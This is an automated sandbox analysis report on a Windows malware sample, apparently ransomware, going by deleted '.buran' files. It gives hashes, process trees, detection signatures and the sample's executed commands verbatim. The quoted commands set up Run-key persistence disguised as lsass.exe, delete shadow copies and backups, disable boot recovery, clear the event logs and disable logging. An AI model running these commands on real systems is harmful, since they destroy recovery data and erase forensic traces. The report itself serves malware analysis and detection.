· 6 years ago · Sep 19, 2019, 03:36 AM
1
2* ID: 2311
3* MalFamily: "Malicious"
4
5* MalScore: 10.0
6
7* File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
8* File Size: 435200
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
11* MD5: "636d3c669e36510bf337fd2f1ea64732"
12* SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
13* SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
14* CRC32: "D4F2AC3B"
15* SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
16
17* Process Execution:
18 "OQyoOv9HxQ.exe",
19 "cmd.exe",
20 "reg.exe",
21 "lsass.exe",
22 "cmd.exe",
23 "cmd.exe",
24 "cmd.exe",
25 "cmd.exe",
26 "cmd.exe",
27 "cmd.exe",
28 "cmd.exe",
29 "WMIC.exe",
30 "cmd.exe",
31 "vssadmin.exe",
32 "cmd.exe",
33 "reg.exe",
34 "cmd.exe",
35 "reg.exe",
36 "cmd.exe",
37 "reg.exe",
38 "cmd.exe",
39 "attrib.exe",
40 "cmd.exe",
41 "cmd.exe",
42 "wevtutil.exe",
43 "cmd.exe",
44 "wevtutil.exe",
45 "cmd.exe",
46 "wevtutil.exe",
47 "cmd.exe",
48 "sc.exe",
49 "lsass.exe",
50 "lsass.exe",
51 "cmd.exe",
52 "PING.EXE",
53 "PING.EXE",
54 "PING.EXE",
55 "PING.EXE",
56 "PING.EXE",
57 "PING.EXE",
58 "PING.EXE",
59 "PING.EXE",
60 "PING.EXE",
61 "PING.EXE",
62 "PING.EXE",
63 "PING.EXE",
64 "PING.EXE",
65 "PING.EXE",
66 "PING.EXE",
67 "PING.EXE",
68 "PING.EXE",
69 "PING.EXE",
70 "PING.EXE",
71 "PING.EXE",
72 "PING.EXE",
73 "PING.EXE",
74 "PING.EXE",
75 "PING.EXE",
76 "PING.EXE",
77 "PING.EXE",
78 "PING.EXE",
79 "PING.EXE",
80 "PING.EXE",
81 "PING.EXE",
82 "PING.EXE",
83 "PING.EXE",
84 "PING.EXE",
85 "PING.EXE",
86 "PING.EXE",
87 "PING.EXE",
88 "PING.EXE",
89 "PING.EXE",
90 "PING.EXE",
91 "PING.EXE",
92 "PING.EXE",
93 "PING.EXE",
94 "PING.EXE",
95 "PING.EXE",
96 "PING.EXE",
97 "PING.EXE",
98 "PING.EXE",
99 "PING.EXE",
100 "PING.EXE",
101 "PING.EXE",
102 "PING.EXE",
103 "PING.EXE",
104 "PING.EXE",
105 "PING.EXE",
106 "PING.EXE",
107 "PING.EXE",
108 "PING.EXE",
109 "PING.EXE",
110 "PING.EXE",
111 "PING.EXE",
112 "PING.EXE",
113 "PING.EXE",
114 "PING.EXE",
115 "PING.EXE",
116 "PING.EXE",
117 "PING.EXE",
118 "PING.EXE",
119 "PING.EXE",
120 "PING.EXE",
121 "PING.EXE",
122 "PING.EXE",
123 "PING.EXE",
124 "PING.EXE",
125 "PING.EXE",
126 "PING.EXE",
127 "PING.EXE",
128 "PING.EXE",
129 "PING.EXE",
130 "PING.EXE",
131 "PING.EXE",
132 "PING.EXE",
133 "services.exe",
134 "svchost.exe",
135 "WmiPrvSE.exe",
136 "svchost.exe",
137 "taskeng.exe",
138 "taskeng.exe",
139 "msoia.exe",
140 "msoia.exe",
141 "taskeng.exe",
142 "WMIADAP.exe",
143 "taskeng.exe",
144 "VSSVC.exe"
145
146
147* Executed Commands:
148 "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
149 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
150 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
151 "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )",
152 "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )",
153 "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
154 "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
155 "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
156 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
157 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
158 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
159 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
160 "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
161 "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
162 "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
163 "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
164 "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
165 "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
166 "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
167 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
168 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
169 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
170 "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
171 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
172 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
173 "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
174 "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
175 "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
176 "taskeng.exe DA0ED248-9EDB-4144-B9E7-AFC1D00A662A S-1-5-18:NT AUTHORITY\\System:Service:",
177 "taskeng.exe A14B62F8-6D27-44D8-BFCB-66F44117F2A4 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
178 "taskeng.exe 4C64B42C-C15C-4AFB-9A31-7317BC95FE05 S-1-5-18:NT AUTHORITY\\System:Service:",
179 "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
180 "taskeng.exe F7093373-6201-40B8-8D09-6E7E59E028EB S-1-5-18:NT AUTHORITY\\System:Service:",
181 "C:\\Windows\\system32\\vssvc.exe",
182 "vssadmin delete shadows /all /quiet",
183 "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
184 "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
185 "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
186 "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
187 "wevtutil.exe clear-log Application",
188 "wevtutil.exe clear-log Security",
189 "wevtutil.exe clear-log System",
190 "sc config eventlog start=disabled",
191 "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
192 "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
193 "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
194
195
196* Signatures Detected:
197
198 "Description": "Behavioural detection: Executable code extraction",
199 "Details":
200
201
202 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
203 "Details":
204
205
206 "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
207 "Details":
208
209 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
210
211
212 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
213
214
215 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
216
217
218 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
219
220
221 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
222
223
224 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
225
226
227 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
228
229
230 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
231
232
233 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
234
235
236 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
237
238
239 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
240
241
242 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
243
244
245 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
246
247
248 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
249
250
251 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
252
253
254 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
255
256
257 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
258
259
260 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
261
262
263
264
265 "Description": "Possible date expiration check, exits too soon after checking local time",
266 "Details":
267
268 "process": "lsass.exe, PID 2296"
269
270
271
272
273 "Description": "Anomalous file deletion behavior detected (10+)",
274 "Details":
275
276 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran"
277
278
279 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran"
280
281
282 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
283
284
285 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
286
287
288 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
289
290
291 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
292
293
294 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
295
296
297 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
298
299
300 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
301
302
303 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
304
305
306 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
307
308
309 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
310
311
312 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
313
314
315 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
316
317
318 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
319
320
321 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
322
323
324 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
325
326
327 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
328
329
330 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
331
332
333 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
334
335
336 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
337
338
339 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
340
341
342 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
343
344
345 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
346
347
348 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
349
350
351 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
352
353
354 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
355
356
357 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
358
359
360 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
361
362
363 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
364
365
366 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
367
368
369 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
370
371
372 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
373
374
375 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
376
377
378 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
379
380
381 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
382
383
384 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
385
386
387 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
388
389
390 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
391
392
393 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
394
395
396 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
397
398
399 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
400
401
402 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
403
404
405 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
406
407
408 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
409
410
411 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
412
413
414 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
415
416
417 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
418
419
420 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
421
422
423 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
424
425
426 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
427
428
429 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
430
431
432 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
433
434
435 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
436
437
438 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
439
440
441 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
442
443
444 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
445
446
447 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
448
449
450 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
451
452
453 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
454
455
456 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
457
458
459 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
460
461
462 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
463
464
465 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
466
467
468 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
469
470
471 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
472
473
474 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
475
476
477 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
478
479
480 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
481
482
483 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
484
485
486 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
487
488
489 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
490
491
492 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
493
494
495 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
496
497
498 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
499
500
501 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
502
503
504 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
505
506
507 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
508
509
510 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
511
512
513 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
514
515
516 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
517
518
519 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
520
521
522 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
523
524
525 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
526
527
528 "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
529
530
531
532
533 "Description": "Guard pages use detected - possible anti-debugging.",
534 "Details":
535
536
537 "Description": "A process attempted to delay the analysis task.",
538 "Details":
539
540 "Process": "WmiPrvSE.exe tried to sleep 361 seconds, actually delayed analysis time by 0 seconds"
541
542
543 "Process": "PING.EXE tried to sleep 345 seconds, actually delayed analysis time by 0 seconds"
544
545
546 "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
547
548
549 "Process": "taskeng.exe tried to sleep 488 seconds, actually delayed analysis time by 0 seconds"
550
551
552
553
554 "Description": "Performs HTTP requests potentially not found in PCAP.",
555 "Details":
556
557 "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
558
559
560
561
562 "Description": "A process created a hidden window",
563 "Details":
564
565 "Process": "OQyoOv9HxQ.exe -> C:\\Windows\\System32\\cmd.exe"
566
567
568 "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
569
570
571
572
573 "Description": "Executed a command line with /V argument which modifies variable behaviour and whitespace allowing for increased obfuscation options",
574 "Details":
575
576 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
577
578
579
580
581 "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
582 "Details":
583
584 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
585
586
587
588
589 "Description": "A ping command was executed with the -n argument possibly to delay analysis",
590 "Details":
591
592 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
593
594
595 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
596
597
598 "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
599
600
601
602
603 "Description": "Uses Windows utilities for basic functionality",
604 "Details":
605
606 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
607
608
609 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
610
611
612 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
613
614
615 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
616
617
618 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
619
620
621 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
622
623
624 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
625
626
627 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
628
629
630 "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
631
632
633 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
634
635
636 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
637
638
639 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
640
641
642 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
643
644
645 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
646
647
648 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
649
650
651 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
652
653
654 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
655
656
657 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
658
659
